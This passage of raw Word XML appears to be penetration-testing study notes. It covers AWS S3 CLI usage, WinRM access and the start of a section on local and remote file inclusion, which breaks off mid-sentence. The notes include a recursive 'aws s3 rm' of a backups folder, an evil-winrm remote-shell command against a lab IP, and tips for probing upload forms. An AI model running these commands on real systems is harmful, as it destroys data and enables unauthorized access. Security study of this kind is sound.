      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 rm s3://my-awesome-bucket/backups/ --recursive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sync folders:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BBD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 sync ./local-folder s3://my-awesome-bucket/documents/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This uploads all files in local-folder to the documents folder in S3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BBF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View Object Metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1420"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3api head-object --bucket my-awesome-bucket --key images/cat.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1420"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get metadata for a specific object:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Interact with Pseudo-Directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> List Files in a "Directory"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BC9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BCA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To list all files under images/vacation/:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls s3://my-awesome-bucket/images/vacation/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BCC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BCD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List All Objects Starting with a Prefix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BCE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BCF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To list all files under images/ (including subfolders):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1198"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls s3://my-awesome-bucket/images/ --recursive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download a "Directory"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To download all files in the images/vacation/ pseudo-directory and then put the contents in a local folder ./vacation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="730"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 sync s3://my-awesome-bucket/images/vacation/ ./vacation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BD9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload Files to a "Directory"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BDA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BDB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To upload files (myfile.txt) into a pseudo-directory (documents/project/):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BDC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="766"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 cp myfile.txt s3://my-awesome-bucket/documents/project/myfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BDE">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BDF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B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E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_aievyyu2c4ld" w:id="227"/>
      <w:bookmarkEnd w:id="227"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WinRM (Windows Remote Manager)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On linux, you can use evil-winrm:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="928"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">evil-winrm -i 10.129.136.91 -u [username]-p [password]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B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BE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BEA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vcram47f0kl7" w:id="228"/>
      <w:bookmarkEnd w:id="228"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI and RFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BEB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="486"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When testing a file upload form</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we should always determine what happens when a file is uploaded twice. If the web application indicates that the file already exists, we can use this method to brute force the contents of a web server. Alternatively, if the web application displays an error message, this may provide valuable information such as the programming language or web technologies in use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BEE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b03u8612i27n" w:id="229"/>
      <w:bookmarkEnd w:id="229"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BEF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5w38mpqcyc6s" w:id="230"/>
      <w:bookmarkEnd w:id="230"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI vs. Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF0">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we examine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local File Inclusion</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LFI), let's take a moment to explore the differences between File Inclusion and Directory Traversal. These two concepts often get mixed up by penetration testers and security professionals. If we confuse the type of vulnerability we find, we may miss an opportunity to obtain code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BF1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As covered in the last Learning Unit, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory traversal vulnerabilities to obtain the contents of a file outside of the web server's web root. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File inclusion</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities allow us to "include" a file in the application's running code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This means we can use file inclusion vulnerabilities to execute local or remote files, while directory traversal only allows us to read the contents of a file. Since we can include files in the application's running code with file inclusion vulnerabilities, we can also display the file contents of non-executable files. For example, if we leverage a directory traversal vulnerability in a PHP web application and specify the file </w:t>
      </w:r>
